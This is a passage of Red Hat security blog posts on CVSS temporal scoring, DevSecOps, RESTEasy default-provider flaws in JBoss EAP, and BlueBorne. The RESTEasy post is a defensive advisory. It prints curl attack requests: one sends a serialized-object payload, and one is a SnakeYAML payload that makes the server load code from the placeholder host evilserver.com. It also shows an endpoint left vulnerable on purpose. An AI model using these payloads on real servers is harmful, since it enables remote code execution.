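As a small worked example of that re-scoring, the sketch below applies the CVSS v3.1 temporal metrics to a base score (an illustration only; the environmental metrics modify the base formula itself and are easiest to compute with the FIRST calculator linked from our CVE pages):
import math

# CVSS v3.1 temporal metric values ("X" means Not Defined).
EXPLOIT_CODE_MATURITY = {"X": 1.0, "H": 1.0, "F": 0.97, "P": 0.94, "U": 0.91}
REMEDIATION_LEVEL     = {"X": 1.0, "U": 1.0, "W": 0.97, "T": 0.96, "O": 0.95}
REPORT_CONFIDENCE     = {"X": 1.0, "C": 1.0, "R": 0.96, "U": 0.92}

def roundup(value):
    # CVSS "round up to one decimal place" (ignoring the spec's floating-point epsilon).
    return math.ceil(value * 10) / 10

def temporal_score(base, e="X", rl="X", rc="X"):
    return roundup(base * EXPLOIT_CODE_MATURITY[e]
                        * REMEDIATION_LEVEL[rl]
                        * REPORT_CONFIDENCE[rc])

# Example: a 7.5 base score with only proof-of-concept exploit code (E:P) and
# an official fix available (RL:O) drops to 6.7.
print(temporal_score(7.5, e="P", rl="O", rc="C"))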
Further technical information to make these determinations can often be found from product support, in the various technical articles and blogs Red Hat makes available, in CVE pages’ Statement or Mitigation sections and in Bugzilla tickets. Customers with support agreements can reach out to product support for additional assistance to evaluate the potential risk for their environment, and confirm if the vulnerability jeopardizes the confidentiality of PCI-DSS data.
Red Hat recognizes that vulnerability scores and impacts may differ, and that they are there to help you assess your environment. As a customer, you can open a support case and provide us the feedback that matters to you. Our support and product teams value this feedback and will use it to provide better results.
Posted: 2018-02-28T14:30:00+00:00
Security is from Mars, Developers are from Venus… or ARE they?
It is a tale as old as time. Developers and security personnel view each other with suspicion. The perception is that a vast gulf of understanding and ability lies between the two camps. “They can’t possibly understand what it is to do my job!” is a surprisingly common statement tossed about. Both groups blame the other for being the source of all of their ills. It has been well-known that fixing security bugs early in the development lifecycle not only helps eliminate exposure to potential vulnerabilities, but it also saves time, effort, and money. Once a defect escapes into production it can be very costly to remediate.
Years of siloing and specialization have driven deep wedges between these two critical groups. Both teams have the same goal: to enable the business. They just take slightly different paths to get there and have different expertise and focus. In the last few decades we’ve all been forced to work more closely together, with movements like Agile reminding everyone that we’re all ultimately there to serve the business and the best interest of our customers. Today, with the overwhelming drive to move to a DevOps model, to get features and functionality out into the hands of our customers faster, we must work better together to make the whole organization succeed.
Through this DevOps shift in mindset (Development and Operations working more closely on building, deploying, and maintaining software), both groups have influenced each other’s thinking. Security has started to embrace the benefits of things like iterative releases and continuous deployments, while our coder-counterparts have expanded their test-driven development methods to include more automation of security test cases and have become more mindful of things like the OWASP Top 10 (the Open Web Application Security Project). We are truly on the brink of a DevSecOps arena where we can have fruitful collaboration from the groups that are behind the engine that drives our respective companies. Those that can embrace this exciting new world are poised to reap the benefits.
Red Hat Product Security is pleased to partner with our friends over in the Red Hat Developer Program. Our peers there are driving innovation in the open source development communities and bringing open source to a new generation of software engineers. It is breathtaking to see the collaboration and ideas that are emerging in this space. We’re also equally pleased that security is not just an afterthought for them. Developing and composing software that considers “security by design” from the earliest stages of the development lifecycle helps projects move faster while delivering innovative and secure solutions. They have recently kicked-off a new site topic that focuses on secure programing and we expect it to be a great resource within the development community: Secure Programming at the Red Hat Developer Program.
In this dedicated space of our developer portal you’ll find a wealth of resources to help coders code with security in mind. You’ll find blogs from noted luminaries. You’ll find defensive coding guides, and other technical materials that will explain how to avoid common coding flaws that could develop into future software vulnerabilities. You’ll also be able to directly engage with Red Hat Developers and other open source communities. This is a great time to establish that partnership and “reach across the aisle” to each other. So whether you are interested in being a better software engineer and writing more secure code, or are looking to advocate for these techniques, Red Hat has a fantastic set of resources to help guide you toward a more secure future!
Posted: 2017-11-16T15:00:00+00:00
Abuse of RESTEasy Default Providers in JBoss EAP
Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for RESTful webservices. A powerful but potentially dangerous feature of RESTful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process the request with the default provider matching the Content-Type HTTP header that the client specifies. Some of the default providers were found to have vulnerabilities, which have now been removed from JBoss EAP and its upstream RESTful webservice project, RESTEasy.
The attack vector
There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing the following:
- @Consumes annotation was present specifying wildcard mediaType {*/*}
- @Consumes annotation was not present on webservice endpoint
- Webservice endpoint consumes a multipart mediaType
Here's an example of what a vulnerable webservice would look like:
import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

    @POST
    @Path("/concat")
    public Map<String, String> doConcat(Pair pair) {
        HashMap<String, String> result = new HashMap<String, String>();
        result.put("Result", pair.getP1() + pair.getP2());
        return result;
    }
}
Notice how there is no @Consumes annotation on the doConcat method.
The vulnerabilities
CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.
If a RESTful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending an HTTP request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializableProvider and could contain a malicious payload generated with ysoserial or similar. Remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.
Here's an example:
curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'
CVE-2016-9606 also exploited the default providers of RESTEasy. This time the YamlProvider was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the SnakeYAML library from RESTEasy was being exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.
SnakeYAML allows loading classes with a URLClassLoader, using its ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading that Java code and executing it.
An example of a malicious request is as follows:
curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat
where evilserver.com is a host controlled by the malicious actor.
Again, you can see the use of the Content-Type HTTP header, which tricks RESTEasy into using the YamlProvider, even though the developer didn't intend for it to be accessible.
How to stay safe
The latest versions of EAP 6.4.x and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but we found it was possible to exploit on 7.1; it is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either EAP 6.4.x or 7.0.x.
If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:
import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

    @POST
    @Path("/concat")
    @Consumes("application/json")
    public Map<String, String> doConcat(Pair pair) {
        HashMap<String, String> result = new HashMap<String, String>();
        result.put("Result", pair.getP1() + pair.getP2());
        return result;
    }
}
Notice that this safe version adds a @Consumes annotation with a mediaType of application/json.
This is good practice anyway, because if an HTTP client tries to send a request with a different Content-Type HTTP header, the application will give an appropriate error response, indicating that the Content-Type is not supported.
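One hedged way to confirm the annotation is doing its job (a sketch only; it reuses the /example/concat endpoint from the examples above and assumes the application is running locally) is to replay a request with an unexpected Content-Type and check that the server now rejects it instead of processing the body:
import urllib.error
import urllib.request

request = urllib.request.Request(
    "http://localhost:8080/example/concat",
    data=b"should-not-be-parsed",
    headers={"Content-Type": "application/x-java-serialized-object"},
    method="POST")

try:
    with urllib.request.urlopen(request, timeout=10) as response:
        print("unexpected success:", response.status)   # a provider still ran
except urllib.error.HTTPError as err:
    # 415 Unsupported Media Type is the expected answer once @Consumes
    # restricts the endpoint to application/json.
    print("got HTTP", err.code)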
Posted: 2017-10-18T13:30:00+00:00
Kernel Stack Protector and BlueBorne
Today, a security issue called BlueBorne was disclosed, a vulnerability that could be used to attack sensitive systems via the Bluetooth protocol. Specifically, BlueBorne is a flaw where a remote (but physically quite close) attacker has the potential to get root on a server, without an internet connection or authentication, via installed and active Bluetooth hardware.
The key phrase is “has the potential.” BlueBorne is still a serious flaw and one that requires patching and remediation, but most Red Hat Enterprise Linux users are at less risk of a direct attack. This is because Bluetooth hardware is not particularly common on servers, and our Server distributions of Red Hat Enterprise Linux don’t enable Bluetooth by default. But what about the desktop and workstation users of Red Hat Enterprise Linux and many other Linux distributions?
Laptops and desktop machines commonly have Bluetooth hardware, and Workstation variants of Red Hat Enterprise Linux enable Bluetooth by default. It’s possible that a malicious actor could use a remote Bluetooth connector to gain access to personal workstations or terminals in an office building, allowing them to gain root for accessing sensitive data or potentially causing a cascading, system-wide attack. This is unlikely, however, on Linux operating systems, including Red Hat Enterprise Linux, thanks to Stack Protection.
Stack Protection has been available for some time, having been introduced in some distributions back in 2005. We believe most major vendor distributions build their Linux kernels with Stack Protection enabled. For us, this includes Fedora Core (since version 5) and Red Hat Enterprise Linux (since version 6). With a kernel compiled in this way, the flaw turns from remote code execution into a remote crash (kernel panic). Having a physically local attacker able to cause your machines to crash without touching them is bad, but it's certainly not as bad as remote root.
Red Hat, along with other Linux distribution vendors and the upstream Kernel security team, received one week advance notice on BlueBorne in order to prepare patches and updates. We used this time to evaluate the issue, develop the fix and build and test updated packages for supported versions of Red Hat Enterprise Linux. We also used the time to provide clearly understood information about the flaw, and how it impacted our products, which can be found in the Vulnerability Article noted below.
Stack Protection works by adding a single check value (a canary) to the stack before the return address, and a buffer overflow could still overwrite other buffers on the stack before reaching that canary, depending on how things get ordered, so it was important for us to check properly. Based on a technical investigation, we concluded that with Stack Protection enabled it would be quite unlikely that this flaw could be exploited to gain code execution. We can't completely rule it out, though, as an attacker may be able to use some other mechanism to bypass it (for example, if they can determine the value of the stack canary, perhaps via a race condition, and combine it with some other flaw).
On some architectures, notably ppc64 and s390x for Red Hat Enterprise Linux, Stack Protection is not used. However the Bluetooth kernel module is not available for our s390x Server variant. And ppc64 is only available in a Server variant, which doesn’t install the bluez package, making it not vulnerable by default even if Bluetooth hardware happens to be present.
So if most distributions build kernels with Stack Protection, and Stack Protection was available for many years before the flaw was introduced, where is the risk? Well, the problem is going to be all those kernels that have been built without Stack Protection turned on. So things like Bluetooth-enabled IoT devices running a vulnerable kernel compiled without Stack Protection will be most at risk from this flaw.
Regardless of whether you have Stack Protection or not, patch your system. BlueBorne remains an important flaw and one that needs to be remedied as soon as possible via the appropriate updates.
For Red Hat customers our page https://access.redhat.com/security/vulnerabilities/blueborne contains information on the patches we released today along with other details and mitigations. We’d like to thank Armis Labs for reporting this vulnerability.
Posted: 2017-09-12T11:51:33+00:00